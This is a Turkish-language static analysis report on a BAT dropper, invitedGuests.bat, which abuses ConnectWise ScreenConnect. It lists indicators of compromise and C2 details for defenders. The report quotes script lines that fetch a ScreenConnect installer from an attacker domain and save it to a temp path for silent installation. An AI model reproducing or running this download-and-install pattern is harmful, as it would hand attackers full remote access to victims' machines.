Manuel Statik Analiz — ScreenConnect (ConnectWise) Kötüye Kullanımı | Tehdit: ORTA

Dosya Kimliği

SHA256e1cd006efa2d3319105200b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2f
Dosya AdıinvitedGuests.bat
Boyut1.052 byte (1KB BAT script)
String Sayisi23

"Davetli Konuklar" Sosyal Mühendislik

invitedGuests.bat
-- "invitedGuests" = "Davetli Konuklar"
-- Senaryo: etkinlik yöneticisi/sekreter → davetli liste belgesi gibi gösterilmiş
-- .bat uzantısı → çift tıklanınca çalışır (Windows Script Exec.)
-- Hedef profil: kurumsal etkinlik organizatörleri, resepsiyon personeli

DGA Benzeri C2: hbdhfijnsgjnds.top

C2 Tespit: hbdhfijnsgjnds.top
https://admin.hbdhfijnsgjnds.top/Bin/ScreenConnect.ClientSetup.msi
-- "hbdhfijnsgjnds" = 14 karakter rastgele harf (DGA benzeri)
-- admin.hbdhfijnsgjnds.top = saldırgan kontrol paneli subdomain'i
-- /Bin/ScreenConnect.ClientSetup.msi = meşru yazılım adı!
-- ?e=Access... = davet/erişim kodu parametresi

BAT Script İçeriği

set "MY_URL=https://admin.hbdhfijnsgjnds.top/Bin/ScreenConnect.ClientSetup.msi?e=Access..."
set "OUTPUT_FILE=%temp%\update_payload.msi"
-- "%temp%\update_payload.msi" = kötü niyetli isim seçimi ("update" = güncelleme gibi görünür)
-- MSI indirilir → "sessiz kurulum" (silent install) → ScreenConnect kurulur
-- Kurbana "yazılım güncellendi" görünür, arka planda saldırgan tam erişim kazanır

Meşru RMM Araç Kötüye Kullanımı

ConnectWise ScreenConnect (eski adıyla Control):
-- Meşru uzak masaüstü / IT destek yazılımı (1990'lardan beri)
-- AV imzaları "meşru imzalı" binary → genellikle kaçırılır
-- Saldırgan kendi instance'ında ScreenConnect server kurar (admin panel)
-- Kurban makinesine ScreenConnect client kurulunca: tam erişim
-- BleepingComputer 2024: ScreenConnect CVE-2024-1709 ile 0-day saldırıları
-- Benzer tehdit: NetSupportRAT (batch 56), AnyDesk abuse, TeamViewer abuse

IOC

SHA256e1cd006efa2d3319105200b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2f
C2hbdhfijnsgjnds.top (admin.hbdhfijnsgjnds.top)
LureinvitedGuests.bat (Davetli Konuklar sosyal mühendislik)

ScreenConnect — Malware Profile

ScreenConnect ConnectWise meşru RMM araç kötüye kullanımı. invitedGuests.bat. BAT dropper + MSI kurulum.

Malware Type
RAT
Programming Language
Proprietary
C2 Protocol
HTTPS
Target Systems
Küresel Kurumsal

Capabilities & Behavior

Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması

IOC List (1 indicators)

IOC — ScreenConnect
# DOMAIN hbdhfijnsgjnds.top
TypeValueNote
domain hbdhfijnsgjnds.top

C2 Servers (2 recorded servers for this family)

Address Type Port Protocol Status Country
hbdhfijnsgjnds.top domain 443 HTTPS inactive —
hbdhfijnsgjnds.top domain 443 HTTPS inactive —

C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.

Tags
screenconnect-abuseinvitedguests-bathbdhfijnsgjnds-topdga-top-domainrmm-abuseconnectwise-abusebat-dropperlegitimate-tool-abuse